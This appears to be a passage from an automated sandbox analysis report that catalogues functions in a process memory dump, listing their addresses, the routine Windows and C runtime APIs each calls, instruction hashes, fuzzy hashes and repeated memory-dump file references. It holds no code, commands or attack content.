Instruction Fuzzy Hash: 611182B4E002489BDB11DFD9DC457EEBBFDAF85314F048019E544AB252DBB9040ADFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: fd8687f7205bbb0c094e1f5ca4efbd3fb327a4fe43516494b640abc870a68b08
Instruction ID: 2424eaf35cbe5a26a1c30343feff6961c1a8cd4ad2cccede2d60b36200a3ac11
Opcode Fuzzy Hash: fd8687f7205bbb0c094e1f5ca4efbd3fb327a4fe43516494b640abc870a68b08
Instruction Fuzzy Hash: A3F1D275D0420A9BCF54EF55C882AEEB375FF44310F244526E805AB261DB39EE82EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FBB1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00FDD1B8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2cf186812f69458eec8b30cb51f8cbed6d9023989746d3e94677b5f06c5883af
Instruction ID: 416947abd46b99e686c28d9431451716805af3ae5ba49d18b0827ca3563fef0e
Opcode Fuzzy Hash: 2cf186812f69458eec8b30cb51f8cbed6d9023989746d3e94677b5f06c5883af
Instruction Fuzzy Hash: 5F919C74A00204CBDB10DF69C885EADB7F5BF49310B28C56AE8169B352D7B5EC41EF62

Uniqueness

Uniqueness Score: -1.00%

Function 00FBC440, Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
Instruction ID: a9cb5212d408a5ba06e156f0c7e4bed6fb40d7f04b1f5940847339cb48686203
Opcode Fuzzy Hash: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
Instruction Fuzzy Hash: EC51B571A04206ABDB14EFA5C881FFBB3B9FF45300F148059E91997251E778EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01016C11, Relevance: 3.1, APIs: 2, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 01016CCB
_memmove.LIBCMT ref: 01016CF6

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: bf6936ea16e96c41efbc4a4e364b2ed277fae174494ad8424e31b6ec89b764af
Instruction ID: 71bc617b407f597b1ce86610cd0a3c2c044dea99a1b61160a950dc32a5c8f8bd
Opcode Fuzzy Hash: bf6936ea16e96c41efbc4a4e364b2ed277fae174494ad8424e31b6ec89b764af
Instruction Fuzzy Hash: 2D41A4B5D00144ABDB11EF94CC82FBE7BB5EF46300F048099F9495B346D67EA946CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FBBFD0, Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FBC01D
_memmove.LIBCMT ref: 00FBC09C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8c446e53c3f754c5ce875d2e5a75483d1229f5febfb7e9ecf4223cd521c960e7
Instruction ID: 7ab61aa53ff2fa5ad17add09b4827fd4df78350bcda90c008ef8a2ebd0f69540
Opcode Fuzzy Hash: 8c446e53c3f754c5ce875d2e5a75483d1229f5febfb7e9ecf4223cd521c960e7
Instruction Fuzzy Hash: 5331D372600202DFC324DF69C881EA7B3E9EF84354B14862EE45AC7351EB75E941DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD8B0, Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00FBD979
FreeLibrary.KERNEL32(?), ref: 00FBD98E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeInfoLibraryParametersSystem
String ID:
API String ID: 3403648963-0
Opcode ID: 8afbe3feb86bfffc6734223a90c9ebe466f108fde465742a31574216a08bce7e
Instruction ID: 85d362871b1627cf045df79fc6df243bac47ac04d892ac2065b3f077a650d61f
Opcode Fuzzy Hash: 8afbe3feb86bfffc6734223a90c9ebe466f108fde465742a31574216a08bce7e
Instruction Fuzzy Hash: D52182B19083019FC310EF1ADD8595ABBE8FB88314F40492DF58897246D77AD945DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3C80, Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB3CB3
_wcscpy.LIBCMT ref: 00FB3CD3

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_wcscpy_wcslen
String ID:
API String ID: 245337311-0
Opcode ID: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
Instruction ID: f4b7a92e69204efcb8ad37606eb330b9045bf5bd371d78b0c6ed32af075b5d13
Opcode Fuzzy Hash: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
Instruction Fuzzy Hash: 511149B05406409FD314DB95C842E26B7E4FF46310F14C82DE85A8B752D639E855DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0100E400, Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00FBF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,00FBF1F5,C:\Users\user\33920049\fmkkelc.omp,010590E8,C:\Users\user\33920049\fmkkelc.omp,?,00FBF1F5,?,?,00000001), ref: 00FBF23C

WritePrivateProfileStringW.KERNEL32 ref: 0100E454
WritePrivateProfileStringW.KERNEL32 ref: 0100E467

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringWrite$FullNamePath
String ID:
API String ID: 3876400906-0
Opcode ID: 2b1c2267643a134e5d870cd3f3f3d63176cf6bb085a5e5996cc2b817497eaae6
Instruction ID: cfc01d034982493a7d48dc0405c96ca4d00bc1aac89edfa973f85eec40a34b04
Opcode Fuzzy Hash: 2b1c2267643a134e5d870cd3f3f3d63176cf6bb085a5e5996cc2b817497eaae6
Instruction Fuzzy Hash: CF018072A003156FE711EB65DC44FAAB7ECEB54320F10C59ABC84AB281DE74AC018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC07A0, Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FC07CA
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00FD6296

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 12d584c6d3feafac08f49516b5f1a923a5d701f911f21c2264a800c30c0c7023
Instruction ID: 25ff633a7ae4146e00ca2da8b927dbde67c7ac25b9a0937c25a19e5af32e498b
Opcode Fuzzy Hash: 12d584c6d3feafac08f49516b5f1a923a5d701f911f21c2264a800c30c0c7023
Instruction Fuzzy Hash: 8F018C30784301FAF2381A289E4BF513694AF05B30F244719B7E5FE2D1D6F878829A44

Uniqueness

Uniqueness Score: -1.00%

Function 00FB16A0, Relevance: 3.0, APIs: 2, Instructions: 50COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00FB16E5

Part of subcall function 00FB2390: _wcslen.LIBCMT ref: 00FB239D
Part of subcall function 00FB2390: _memmove.LIBCMT ref: 00FB23C3

_wcscat.LIBCMT ref: 00FD8BC8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FullNamePath_memmove_wcscat_wcslen
String ID:
API String ID: 189345764-0
Opcode ID: 2752c8a84ec5241b71bbd1d639c533629cb4f4b565261fb071b9c8be193469da
Instruction ID: 0f5cd6200a2294d4a01cef7f7a1ccdf1da8b03b44632ee8d648258052f5a426c
Opcode Fuzzy Hash: 2752c8a84ec5241b71bbd1d639c533629cb4f4b565261fb071b9c8be193469da
Instruction Fuzzy Hash: 2C01D67594020C97CB50EF62CC82ADE73B8BF55340F10859AEC4597201EE389A85AFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4966, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00FC7E9A: __getptd_noexit.LIBCMT ref: 00FC7E9A

__lock_file.LIBCMT ref: 00FC49AD

Part of subcall function 00FC5391: __lock.LIBCMT ref: 00FC53B6

__fclose_nolock.LIBCMT ref: 00FC49B8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 6fc14a82e8be68cee52ade07141110cea02c4caf0dc1c068bf267b684aeac348
Instruction ID: 1dfc88444ed3e6f3a052b31cbee6744262766258f68d892a8a8af55327e54583
Opcode Fuzzy Hash: 6fc14a82e8be68cee52ade07141110cea02c4caf0dc1c068bf267b684aeac348
Instruction Fuzzy Hash: 63F062328047279AD710ABA58E13F5F77A06F00330F10864CA4649A1D1C77C6901BB56

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD5C0, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00FBD5DC

Part of subcall function 00FB9430: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB94B6

Sleep.KERNEL32(00000000), ref: 00FDE125

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePeekSleepTimetime
String ID:
API String ID: 1792118007-0
Opcode ID: 37becf9dc43dcab5df290e2ae2fbbb6aab72304810f45fbdb210981e592ed0dc
Instruction ID: 40e0177607733f6f38c33d954baad16c9c863e89d02b89e6dbe8a508104e0f0e
Opcode Fuzzy Hash: 37becf9dc43dcab5df290e2ae2fbbb6aab72304810f45fbdb210981e592ed0dc
Instruction Fuzzy Hash: B1F08C312442029FC314EF6AD849BA6BBE9BF55350F00403AE96ACB340EB70B800DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC05C0, Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 00FC05D8
SystemParametersInfoW.USER32 ref: 00FC05EE

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherInfoParametersSystemUser
String ID:
API String ID: 1232580896-0
Opcode ID: d4d4a12ade5c61769fb768aa149e0135b6f5a3c7bb71b92c1708ceb44a3d9661
Instruction ID: 77ccbe9422549c1802b8e9bebeba7af453c5e684010ede3fe3b9b9dade63a654
Opcode Fuzzy Hash: d4d4a12ade5c61769fb768aa149e0135b6f5a3c7bb71b92c1708ceb44a3d9661
Instruction Fuzzy Hash: 2AE0BF7269431876E610DA849C46F95B75C9704B10F104156BB04AB2C1D5F1BD0087D5

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3D20, Relevance: 2.6, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00FB378C,?,?,?,00000010), ref: 00FB3D38

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00FB3D71

Part of subcall function 00FB3DA0: _memmove.LIBCMT ref: 00FB3DD7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_malloc_memmove
String ID:
API String ID: 961785871-0
Opcode ID: d2d7c7f1f44238b686be078d1c8dfdbac4384b6e514c6a2d3402b642fe6397be
Instruction ID: d46cd7dea71be9bdbb3f82dd5044f2f11e553a8b8d6e371873b2592d5b263756
Opcode Fuzzy Hash: d2d7c7f1f44238b686be078d1c8dfdbac4384b6e514c6a2d3402b642fe6397be
Instruction Fuzzy Hash: 8F01D6713842047FE714A665DD47FAB779CEB89710F044029FA09DB2C1D5B5ED009761

Uniqueness

Uniqueness Score: -1.00%

Function 0101F94D, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

_memmove.LIBCMT ref: 0101FAAB

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: a03e81231a372cde462a37ba220d6cd36be7e4d6ffe0954a6d0d7d3812dca82c
Instruction ID: 37999876ced53d1ec2c0797953b774e9223103fb095feb2ca02d3fd70e165621
Opcode Fuzzy Hash: a03e81231a372cde462a37ba220d6cd36be7e4d6ffe0954a6d0d7d3812dca82c
Instruction Fuzzy Hash: 0C51B7B22042025BD710EF68CD82F6AB7E9BF85700F144559F9859B342D779ED09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3290, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FB32FD

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: a77653de2201aedd52d368282f6effaa608a90f0a9a56ca09392478186a940bc
Instruction ID: 175f15a1e94dbc541260a0c856c35d8c943e556870fabaa38e245ac613201af9
Opcode Fuzzy Hash: a77653de2201aedd52d368282f6effaa608a90f0a9a56ca09392478186a940bc
Instruction Fuzzy Hash: 7A31C636F442108FDF30EE5A98805EAB395FB54730B5E4127E9588B251CA369E41FF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FBB650, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6c41ab0813c8b09fb6e5986aa9d3ee21cd9fbc823b461825221909d8a91d68
Instruction ID: 8bca8474c006f0e8879a9c55cc4ea02007cda35a87c151fde64cbf8331b85fa5
Opcode Fuzzy Hash: ea6c41ab0813c8b09fb6e5986aa9d3ee21cd9fbc823b461825221909d8a91d68
Instruction Fuzzy Hash: 73310775E04201DFC720EE2ACD87F66B3AABF41760B244859E40587212DBB9EC54FF91

Uniqueness

Uniqueness Score: -1.00%

Function 0101B5B4, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0101B71C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0abba2e34e83aa3bdc4318f2480b521101d55171df52be522f97f58855171846
Instruction ID: 9b7951aed4a8e7c8e4834846190d76372e60c7fc08b71681883ae06ccb534748
Opcode Fuzzy Hash: 0abba2e34e83aa3bdc4318f2480b521101d55171df52be522f97f58855171846
Instruction Fuzzy Hash: 524137B4504602DBCB10EF19C8856AAFBF4FF08304F24881DE5D54B356D7B9A994EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3130, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FB3196

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 10a2dd687419e9bcf7f193b0adfb9a6aee5913000fb7b59448f5bd64ccd4d787
Instruction ID: 3553aca985af208b03b8bfcbcf522a2c59fdecadff7241bf24633d58e07cae53
Opcode Fuzzy Hash: 10a2dd687419e9bcf7f193b0adfb9a6aee5913000fb7b59448f5bd64ccd4d787
Instruction Fuzzy Hash: 97318571E00209EBEF149F96D9467AEFBF8FF40700F2485AAD855D6350E7399A90EB40

Uniqueness

Uniqueness Score: -1.00%

Function 0100C71D, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0100C783

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wsplitpath
String ID:
API String ID: 3929583758-0
Opcode ID: 2aa78ccf235c2293a20f38b32cfcac74dc41251c43fa9aa8cfca58fae021ab07
Instruction ID: f51d21a9a31a1f5d3d7e900bac803e340ebe9bf739bbe6a123fc95552c0712c1
Opcode Fuzzy Hash: 2aa78ccf235c2293a20f38b32cfcac74dc41251c43fa9aa8cfca58fae021ab07
Instruction Fuzzy Hash: 5D31A3725003005BEB11EF69CD85B9BB3D4BF84314F04899CFD995B282DB79E909CBA2

Uniqueness

